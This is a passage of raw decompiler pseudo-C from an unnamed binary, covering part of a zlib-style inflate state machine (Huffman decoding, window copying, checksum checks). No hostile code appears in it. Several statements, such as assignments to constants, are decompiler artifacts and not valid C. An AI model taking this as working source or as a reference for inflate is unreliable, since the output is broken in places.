												__ecx =  *(__edi + 0x68);
												__ebx = __ebx >> 3;
												__esi = __esi - 3;
											} while ( *(__edi + 0x68) <  *(__edi + 0x5c));
											goto L172;
										}
										goto L331;
									case 0x11:
										L177:
										__eax =  *(__edi + 0x64);
										__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
										if( *(__edi + 0x68) >= __eax) {
											L210:
											if( *__edi == 0x1b) {
												goto L304;
											} else {
												__eax = __edi + 0x530;
												__ecx = __edi + 0x6c;
												 *(__edi + 0x6c) = __eax;
												__edx = __edi + 0x2f0;
												 *(__edi + 0x4c) = __eax;
												__eax = __edi + 0x54;
												__ecx =  *(__edi + 0x60);
												__edx = __edi + 0x70;
												 *(__edi + 0x54) = 9;
												__eax = E00408C60(1, __edi + 0x70,  *(__edi + 0x60),  *(__edi + 0x60), __edi + 0x54, __edi + 0x2f0);
												 *(__esp + 0x30) = __eax;
												if(__eax == 0) {
													__edx =  *(__edi + 0x6c);
													__ecx = __edi + 0x6c;
													 *(__edi + 0x50) =  *(__edi + 0x6c);
													__edx = __edi + 0x2f0;
													__eax = __edi + 0x58;
													__ecx =  *(__edi + 0x60);
													 *(__edi + 0x58) = 6;
													__eax =  *(__edi + 0x64);
													__edx = __edi + 0x70 +  *(__edi + 0x60) * 2;
													__eax = E00408C60(2, __edi + 0x70 +  *(__edi + 0x60) * 2,  *(__edi + 0x64), __edi + 0x6c,  *(__edi + 0x64), __edi + 0x2f0);
													__edx =  *(__esp + 0x28);
													 *(__esp + 0x30) = __eax;
													if(__eax == 0) {
														 *__edi = 0x12;
														goto L216;
													} else {
														__eax =  *(__esp + 0x40);
														 *(__eax + 0x18) = 0x41d338;
														goto L303;
													}
												} else {
													__eax =  *(__esp + 0x40);
													__edx =  *(__esp + 0x10);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											}
										} else {
											do {
												__ecx =  *(__edi + 0x54);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x4c);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x14) = 1;
												if((__cl & 0x000000ff) <= __esi) {
													L181:
													__eax = __eax >> 0x10;
													if(__eax >> 0x10 >= 0x10) {
														__cx =  *((intOrPtr*)(__esp + 0x16));
														if(__cx != 0x10) {
															__ecx = __ah & 0x000000ff;
															 *(__esp + 0x2c) = __ecx;
															if(__cx != 0x11) {
																__eax = __ecx + 7;
																if(__esi >= __eax) {
																	L203:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x0000007f;
																	__eax = (__ebx & 0x0000007f) + 0xb;
																	 *(__esp + 0x14) = (__ebx & 0x0000007f) + 0xb;
																	__ebx = __ebx >> 7;
																	__eax = 0xfffffff9;
																	goto L204;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 7;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L203;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															} else {
																__eax = __ecx + 3;
																if(__esi >= __eax) {
																	L199:
																	__ebx = __ebx >> __cl;
																	__ebx = __ebx & 0x00000007;
																	__eax = (__ebx & 0x00000007) + 3;
																	 *(__esp + 0x14) = (__ebx & 0x00000007) + 3;
																	__ebx = __ebx >> 3;
																	__eax = 0xfffffffd;
																	L204:
																	__esi = __esi + __eax;
																	__eax =  *(__esp + 0x14);
																	 *(__esp + 0x20) = 0;
																	goto L205;
																} else {
																	while(__edx != 0) {
																		__eax =  *__ebp & 0x000000ff;
																		__ecx = __esi;
																		__eax = ( *__ebp & 0x000000ff) << __cl;
																		__ecx =  *(__esp + 0x2c);
																		__edx = __edx - 1;
																		__esi = __esi + 8;
																		__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																		__eax = __ecx + 3;
																		__ebp =  &(__ebp[1]);
																		 *(__esp + 0x10) = __edx;
																		if(__esi < __eax) {
																			continue;
																		} else {
																			goto L199;
																		}
																		goto L331;
																	}
																	goto L312;
																}
															}
														} else {
															__ecx = __ah & 0x000000ff;
															__eax = __ecx + 2;
															 *(__esp + 0x2c) = __ecx;
															if(__esi >= __eax) {
																L192:
																__eax =  *(__edi + 0x68);
																__ebx = __ebx >> __cl;
																__esi = __esi - __ecx;
																if(__eax == 0) {
																	goto L302;
																} else {
																	__ecx =  *(__edi + 0x6e + __eax * 2) & 0x0000ffff;
																	__ebx = __ebx & 0x00000003;
																	__eax = (__ebx & 0x00000003) + 3;
																	__ebx = __ebx >> 2;
																	 *(__esp + 0x20) = __ecx;
																	 *(__esp + 0x14) = __eax;
																	__esi = __esi - 2;
																	L205:
																	__ecx =  *(__edi + 0x68);
																	__ecx =  *(__edi + 0x68) + __eax;
																	 *(__edi + 0x64) =  *(__edi + 0x64) +  *(__edi + 0x60);
																	if(__ecx >  *(__edi + 0x64) +  *(__edi + 0x60)) {
																		L34:
																		__eax =  *(__esp + 0x40);
																		 *(__eax + 0x18) = 0x41d338;
																		goto L303;
																	} else {
																		if( *(__esp + 0x14) != 0) {
																			__eax =  *(__esp + 0x20);
																			do {
																				__ecx =  *(__edi + 0x68);
																				 *(__esp + 0x14) =  *(__esp + 0x14) - 1;
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __ax;
																				 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
																			} while ( *(__esp + 0x14) != 0);
																		}
																		goto L209;
																	}
																}
															} else {
																while(__edx != 0) {
																	__eax =  *__ebp & 0x000000ff;
																	__ecx = __esi;
																	__eax = ( *__ebp & 0x000000ff) << __cl;
																	__ecx =  *(__esp + 0x2c);
																	__edx = __edx - 1;
																	__esi = __esi + 8;
																	__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
																	__eax = __ecx + 2;
																	__ebp =  &(__ebp[1]);
																	 *(__esp + 0x10) = __edx;
																	if(__esi < __eax) {
																		continue;
																	} else {
																		goto L192;
																	}
																	goto L331;
																}
																goto L312;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														if(__esi >= (__cl & 0x000000ff)) {
															L186:
															__ecx = __ah & 0x000000ff;
															__eax =  *(__edi + 0x68);
															__ebx = __ebx >> __cl;
															__esi = __esi - (__ah & 0x000000ff);
															__cx =  *((intOrPtr*)(__esp + 0x16));
															 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __cx;
															 *(__edi + 0x68) =  *(__edi + 0x68) + 1;
															goto L209;
														} else {
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																__eax =  *(__esp + 0x14);
																__ecx = __ah & 0x000000ff;
																 *(__esp + 0x10) = __edx;
																if(__esi < (__ah & 0x000000ff)) {
																	continue;
																} else {
																	goto L186;
																}
																goto L331;
															}
															goto L312;
														}
													}
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__ecx =  *(__edi + 0x54);
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
														1 = 1 << __cl;
														__ecx =  *(__edi + 0x4c);
														__ebp =  &(__ebp[1]);
														 *(__esp + 0x10) = __edx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
														__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
														1 = 1 >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x14) = 1;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L181;
														}
														goto L331;
													}
													goto L312;
												}
												goto L331;
												L209:
												__eax =  *(__edi + 0x64);
												__eax =  *(__edi + 0x64) +  *(__edi + 0x60);
											} while ( *(__edi + 0x68) < __eax);
											goto L210;
										}
										goto L331;
									case 0x12:
										L216:
										if(__edx < 6 ||  *(__esp + 0x18) < 0x102) {
											__ecx =  *(__edi + 0x54);
											1 = 1 << __cl;
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
											__eax =  *(__edi + 0x4c);
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
											__eax = __eax >> 8;
											__ecx = __cl & 0x000000ff;
											 *(__esp + 0x14) = __eax;
											if((__cl & 0x000000ff) <= __esi) {
												L223:
												if(__al == 0 || (__al & 0x000000f0) != 0) {
													L230:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													__ebx = __ebx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x20) = __ecx;
													__eax = __eax >> 0x10;
													 *(__edi + 0x40) = __eax >> 0x10;
													if(__al != 0) {
														if((__al & 0x00000020) == 0) {
															if((__al & 0x00000040) == 0) {
																__al & 0x000000ff = __al & 0xf;
																 *(__edi + 0x48) = __al & 0xf;
																 *__edi = 0x13;
																goto L237;
															} else {
																__eax =  *(__esp + 0x40);
																 *(__eax + 0x18) = 0x41d338;
																goto L303;
															}
														} else {
															L233:
															 *__edi = 0xb;
															goto L304;
														}
													} else {
														 *__edi = 0x17;
														goto L304;
													}
												} else {
													__eax = __eax >> 8;
													 *(__esp + 0x34) = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x20) = __cl & 0x000000ff;
													__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
													 *(__esp + 0x2c) = __eax;
													1 = 1 << __cl;
													__ecx =  *(__esp + 0x20);
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
													 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
													__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
													__eax =  *(__edi + 0x4c);
													__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10)) * 4);
													__ecx =  *(__esp + 0x34) & 0x000000ff;
													 *(__esp + 0x14) = __eax;
													__eax = __al & 0x000000ff;
													__eax = (__al & 0x000000ff) + ( *(__esp + 0x34) & 0x000000ff);
													if(__eax <= __esi) {
														L229:
														__ecx =  *(__esp + 0x2d) & 0x000000ff;
														__eax =  *(__esp + 0x14);
														__ebx = __ebx >> __cl;
														__esi = __esi - ( *(__esp + 0x2d) & 0x000000ff);
														goto L230;
													} else {
														while(__edx != 0) {
															__eax =  *__ebp & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebp & 0x000000ff) << __cl;
															__ecx =  *(__esp + 0x2c);
															__edx = __edx - 1;
															__esi = __esi + 8;
															__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
															__eax = __ch & 0x000000ff;
															 *(__esp + 0x20) = __eax;
															__cl & 0x000000ff = (__cl & 0x000000ff) + __eax;
															1 = 1 << __cl;
															__ecx =  *(__esp + 0x20);
															__ebp =  &(__ebp[1]);
															 *(__esp + 0x10) = __edx;
															(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
															__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
															__ecx =  *(__esp + 0x2e) & 0x0000ffff;
															__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff);
															__ecx =  *(__edi + 0x4c);
															__eax =  *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4);
															 *(__esp + 0x14) = 1;
															 *( *(__edi + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4) >> 8 = __al & 0x000000ff;
															__eax = (__al & 0x000000ff) +  *(__esp + 0x20);
															if(__eax > __esi) {
																continue;
															} else {
																goto L229;
															}
															goto L331;
														}
														goto L312;
													}
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__ecx =  *(__edi + 0x54);
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
													1 = 1 << __cl;
													__ecx =  *(__edi + 0x4c);
													__ebp =  &(__ebp[1]);
													 *(__esp + 0x10) = __edx;
													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
													__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
													1 = 1 >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x14) = 1;
													if((__cl & 0x000000ff) > __esi) {
														continue;
													} else {
														goto L223;
													}
													goto L331;
												}
												goto L312;
											}
										} else {
											__eax =  *(__esp + 0x40);
											__edx =  *(__esp + 0x18);
											__ecx =  *(__esp + 0x24);
											 *(__eax + 0x10) =  *(__esp + 0x18);
											__edx =  *(__esp + 0x28);
											 *(__eax + 0xc) =  *(__esp + 0x24);
											__ecx =  *(__esp + 0x10);
											_push( *(__esp + 0x28));
											 *__eax = __ebp;
											 *(__eax + 4) = __ecx;
											_push(__eax);
											 *(__edi + 0x38) = __ebx;
											 *(__edi + 0x3c) = __esi;
											__eax = E00406CA0();
											__eax =  *(__esp + 0x48);
											__edx =  *(__eax + 0x10);
											__ecx =  *(__eax + 0xc);
											__ebp =  *__eax;
											__eax =  *(__eax + 4);
											__ebx =  *(__edi + 0x38);
											__esi =  *(__edi + 0x3c);
											 *(__esp + 0x20) = __edx;
											__esp = __esp + 8;
											 *(__esp + 0x24) = __ecx;
											 *(__esp + 0x10) = __eax;
											__edx = __eax;
											goto L304;
										}
										goto L331;
									case 0x13:
										L237:
										__eax =  *(__edi + 0x48);
										if(__eax == 0) {
											L243:
											 *__edi = 0x14;
											goto L244;
										} else {
											if(__esi >= __eax) {
												L242:
												__ecx =  *(__edi + 0x48);
												1 = 1 << __cl;
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												 *(__edi + 0x40) =  *(__edi + 0x40) + ((0x00000001 << __cl) - 0x00000001 & __ebx);
												__ebx = __ebx >> __cl;
												__esi = __esi -  *(__edi + 0x48);
												goto L243;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi <  *(__edi + 0x48)) {
														continue;
													} else {
														goto L242;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x14:
										L244:
										__ecx =  *(__edi + 0x58);
										1 = 1 << __cl;
										(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__ecx = (0x00000001 << __cl) - 0x00000001 & __ebx;
										__eax =  *(__edi + 0x50);
										__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										 *(__esp + 0x14) = __eax;
										if((__cl & 0x000000ff) <= __esi) {
											L248:
											if((__al & 0x000000f0) != 0) {
												L253:
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												__ebx = __ebx >> __cl;
												__esi = __esi - __ecx;
												 *(__esp + 0x20) = __ecx;
												if((__al & 0x00000040) == 0) {
													__ecx = __eax;
													__eax = __al & 0x000000ff;
													__ecx = __ecx >> 0x10;
													__eax = __al & 0xf;
													 *(__edi + 0x44) = __ecx;
													 *(__edi + 0x48) = __al & 0xf;
													 *__edi = 0x15;
													goto L256;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											} else {
												__eax = __eax >> 8;
												 *(__esp + 0x34) = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x20) = __cl & 0x000000ff;
												__al & 0x000000ff = (__al & 0x000000ff) +  *(__esp + 0x20);
												 *(__esp + 0x2c) = __eax;
												1 = 1 << __cl;
												__ecx =  *(__esp + 0x20);
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
												 *(__esp + 0x14) =  *(__esp + 0x14) >> 0x10;
												__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__ecx = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10);
												__eax =  *(__edi + 0x50);
												__eax =  *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x14) >> 0x10)) * 4);
												__ecx =  *(__esp + 0x34) & 0x000000ff;
												 *(__esp + 0x14) = __eax;
												__eax = __al & 0x000000ff;
												__eax = (__al & 0x000000ff) + ( *(__esp + 0x34) & 0x000000ff);
												if(__eax <= __esi) {
													L252:
													__ecx =  *(__esp + 0x2d) & 0x000000ff;
													__eax =  *(__esp + 0x14);
													__ebx = __ebx >> __cl;
													__esi = __esi - ( *(__esp + 0x2d) & 0x000000ff);
													goto L253;
												} else {
													while(__edx != 0) {
														__eax =  *__ebp & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebp & 0x000000ff) << __cl;
														__ecx =  *(__esp + 0x2c);
														__edx = __edx - 1;
														__esi = __esi + 8;
														__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
														__eax = __ch & 0x000000ff;
														 *(__esp + 0x20) = __eax;
														__cl & 0x000000ff = (__cl & 0x000000ff) + __eax;
														1 = 1 << __cl;
														__ecx =  *(__esp + 0x20);
														__ebp =  &(__ebp[1]);
														 *(__esp + 0x10) = __edx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
														__eax = ((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl;
														__ecx =  *(__esp + 0x2e) & 0x0000ffff;
														__eax = (((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff);
														__ecx =  *(__edi + 0x50);
														__eax =  *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4);
														 *(__esp + 0x14) = 1;
														 *( *(__edi + 0x50) + ((((0x00000001 << __cl) - 0x00000001 & __ebx) >> __cl) + ( *(__esp + 0x2e) & 0x0000ffff)) * 4) >> 8 = __al & 0x000000ff;
														__eax = (__al & 0x000000ff) +  *(__esp + 0x20);
														if(__eax > __esi) {
															continue;
														} else {
															goto L252;
														}
														goto L331;
													}
													goto L312;
												}
											}
										} else {
											while(__edx != 0) {
												__eax =  *__ebp & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebp & 0x000000ff) << __cl;
												__ecx =  *(__edi + 0x58);
												__edx = __edx - 1;
												__esi = __esi + 8;
												__ebx = __ebx + (( *__ebp & 0x000000ff) << __cl);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x50);
												__ebp =  &(__ebp[1]);
												 *(__esp + 0x10) = __edx;
												(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __ebx;
												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __ebx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__esp + 0x14) = 1;
												if((__cl & 0x000000ff) > __esi) {
													continue;
												} else {
													goto L248;
												}
												goto L331;
											}
											goto L312;
										}
										goto L331;
									case 0x15:
										L256:
										__eax =  *(__edi + 0x48);
										if(__eax == 0) {
											L261:
											 *((intOrPtr*)(__edi + 0x2c)) =  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18);
											__ecx =  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18) +  *(__esp + 0x28);
											if( *(__edi + 0x44) <=  *((intOrPtr*)(__edi + 0x2c)) -  *(__esp + 0x18) +  *(__esp + 0x28)) {
												 *__edi = 0x16;
												goto L264;
											} else {
												__eax =  *(__esp + 0x40);
												 *(__eax + 0x18) = 0x41d338;
												goto L303;
											}
										} else {
											if(__esi >= __eax) {
												L260:
												__ecx =  *(__edi + 0x48);
												1 = 1 << __cl;
												__eax = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __ebx;
												 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
												__ebx = __ebx >> __cl;
												__esi = __esi -  *(__edi + 0x48);
												goto L261;
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi <  *(__edi + 0x48)) {
														continue;
													} else {
														goto L260;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x16:
										L264:
										if( *(__esp + 0x18) == 0) {
											goto L312;
										} else {
											__ecx =  *(__esp + 0x28);
											__ecx =  *(__esp + 0x28) -  *(__esp + 0x18);
											__eax =  *(__edi + 0x44);
											if(__eax <= __ecx) {
												__ecx =  *(__esp + 0x24);
												__ecx =  *(__esp + 0x24) - __eax;
												__eax =  *(__edi + 0x40);
												 *(__esp + 0x2c) = __ecx;
												 *(__esp + 0x34) = __eax;
												goto L272;
											} else {
												__eax = __eax - __ecx;
												__ecx =  *(__edi + 0x30);
												 *(__esp + 0x14) = __eax;
												if(__eax <= __ecx) {
													 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) - __eax;
													__ecx =  *((intOrPtr*)(__edi + 0x34)) - __eax +  *(__edi + 0x30);
													__eax =  *(__esp + 0x14);
												} else {
													__eax = __eax - __ecx;
													 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28));
													 *(__esp + 0x14) = __eax;
													__ecx =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28)) - __eax;
												}
												 *(__esp + 0x2c) = __ecx;
												__ecx =  *(__edi + 0x40);
												 *(__esp + 0x34) = __ecx;
												if(__eax > __ecx) {
													__eax = __ecx;
													L272:
													 *(__esp + 0x14) = __eax;
												}
											}
											__ecx =  *(__esp + 0x18);
											if(__eax > __ecx) {
												__eax = __ecx;
												 *(__esp + 0x14) = __eax;
											}
											 *(__esp + 0x18) = __ecx;
											__ecx =  *(__esp + 0x34);
											__ecx =  *(__esp + 0x34) - __eax;
											__eax =  *(__esp + 0x24);
											 *(__edi + 0x40) = __ecx;
											do {
												__ecx =  *(__esp + 0x2c);
												__cl =  *( *(__esp + 0x2c));
												 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
												 *__eax = __cl;
												__eax = __eax + 1;
												_t549 = __esp + 0x14;
												 *_t549 =  *(__esp + 0x14) - 1;
											} while ( *_t549 != 0);
											 *(__esp + 0x24) = __eax;
											if( *(__edi + 0x40) == 0) {
												 *__edi = 0x12;
											}
											goto L304;
										}
										goto L331;
									case 0x17:
										if( *(__esp + 0x18) == 0) {
											goto L312;
										} else {
											__eax =  *(__esp + 0x24);
											__cl =  *(__edi + 0x40);
											 *__eax = __cl;
											__eax = __eax + 1;
											 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
											 *(__esp + 0x24) = __eax;
											 *__edi = 0x12;
											goto L304;
										}
										goto L331;
									case 0x18:
										if( *((intOrPtr*)(__edi + 8)) == 0) {
											L295:
											 *__edi = 0x19;
											goto L296;
										} else {
											if(__esi >= 0x20) {
												L285:
												__eax =  *(__esp + 0x28);
												__eax =  *(__esp + 0x28) -  *(__esp + 0x18);
												__ecx =  *(__esp + 0x40);
												 *((intOrPtr*)( *(__esp + 0x40) + 0x14)) =  *((intOrPtr*)( *(__esp + 0x40) + 0x14)) + __eax;
												 *((intOrPtr*)(__edi + 0x1c)) =  *((intOrPtr*)(__edi + 0x1c)) + __eax;
												 *(__esp + 0x28) = __eax;
												if(__eax != 0) {
													__ecx =  *(__esp + 0x24);
													__edx =  *(__edi + 0x18);
													_push(__eax);
													_push(__ecx);
													_push( *(__edi + 0x18));
													if( *(__edi + 0x10) == 0) {
														__eax = E004024A0();
													} else {
														__eax = E00403080();
													}
													__ecx =  *(__esp + 0x4c);
													__edx =  *(__esp + 0x1c);
													 *(__edi + 0x18) = __eax;
													__esp = __esp + 0xc;
													 *(__ecx + 0x30) = __eax;
												}
												__eax =  *(__esp + 0x18);
												 *(__esp + 0x28) =  *(__esp + 0x18);
												__eax = __ebx;
												if( *(__edi + 0x10) == 0) {
													__eax = __eax & 0x0000ff00;
													__ebx = __ebx << 0x10;
													__eax = __eax + (__ebx << 0x10);
													__ebx = __ebx >> 8;
													__ecx = __ebx >> 0x00000008 & 0x0000ff00;
													__eax = __eax << 8;
													__eax = __eax + (__ebx >> 0x00000008 & 0x0000ff00);
													__ebx = __ebx >> 0x18;
													__eax = __eax + (__ebx >> 0x18);
												}
												if(__eax ==  *(__edi + 0x18)) {
													__ebx = 0;
													__esi = 0;
													goto L295;
												} else {
													__eax =  *(__esp + 0x40);
													 *(__eax + 0x18) = 0x41d338;
													goto L303;
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L285;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x19:
										L296:
										if( *((intOrPtr*)(__edi + 8)) == 0 ||  *(__edi + 0x10) == 0) {
											L309:
											 *__edi = 0x1a;
											goto L310;
										} else {
											if(__esi >= 0x20) {
												L301:
												if(__ebx ==  *((intOrPtr*)(__edi + 0x1c))) {
													__ebx = 0;
													__esi = 0;
													goto L309;
												} else {
													L302:
													( *(_t730 + 0x40))[6] = 0x41d338;
													L303:
													 *_t714 = 0x1b;
													goto L304;
												}
											} else {
												while(__edx != 0) {
													__eax =  *__ebp & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebp & 0x000000ff) << __cl;
													__edx = __edx - 1;
													__esi = __esi + 8;
													__ebp =  &(__ebp[1]);
													__ebx = __ebx + __eax;
													 *(__esp + 0x10) = __edx;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L301;
													}
													goto L331;
												}
												goto L312;
											}
										}
										goto L331;
									case 0x1a:
										L310:
										 *(__esp + 0x30) = 1;
										goto L312;
									case 0x1b:
										 *(__esp + 0x30) = 0xfffffffd;
										L312:
										_t651 =  *(_t730 + 0x40);
										_t651[3] =  *(_t730 + 0x24);
										_t651[4] =  *(_t730 + 0x18);
										 *_t651 = _t723;
										_t651[1] = _t705;
										_t714[0xe] = _t667;
										_t714[0xf] = _t716;
										if(_t714[0xa] != 0 ||  *_t714 < 0x18 &&  *(_t730 + 0x28) != _t651[4]) {
											if(E004072B0( *(_t730 + 0x28),  *(_t730 + 0x40)) == 0) {
												goto L318;
											} else {
												 *_t714 = 0x1c;
												goto L317;
											}
										} else {
											L318:
											_t718 =  *(_t730 + 0x40);
											_t726 =  *(_t730 + 0x38) - _t718[1];
											_t675 =  *(_t730 + 0x28) - _t718[4];
											_t718[2] =  &(_t718[2][_t726]);
											_t718[5] =  &(_t718[5][_t675]);
											_t714[7] = _t714[7] + _t675;
											if(_t714[2] != 0 && _t675 != 0) {
												_push(_t675);
												if(_t714[4] == 0) {
													_push(_t718[3] - _t675);
													_push(_t714[6]);
													_t662 = E004024A0();
												} else {
													_push(_t718[3] - _t675);
													_push(_t714[6]);
													_t662 = E00403080();
												}
												_t714[6] = _t662;
												_t730 = _t730 + 0xc;
												_t718[0xc] = _t662;
											}
											asm("sbb edx, edx");
											_t718[0xb] = ( ~(_t714[1]) & 0x00000040) + ((0 |  *_t714 != 0x0000000b) - 0x00000001 & 0x00000080) + _t714[0xf];
											if(_t726 != 0 || _t675 != 0) {
												if( *((intOrPtr*)(_t730 + 0x44)) != 4) {
													return  *(_t730 + 0x30);
												} else {
													goto L327;
												}
											} else {
												L327:
												_t641 =  *(_t730 + 0x30);
												if(_t641 != 0) {
													L306:
													return _t641;
												} else {
													return 0xfffffffb;
												}
											}
										}
										goto L331;
									case 0x1c:
										L317:
										return 0xfffffffc;
										goto L331;
								}
								L304:
								_t640 =  *_t714;
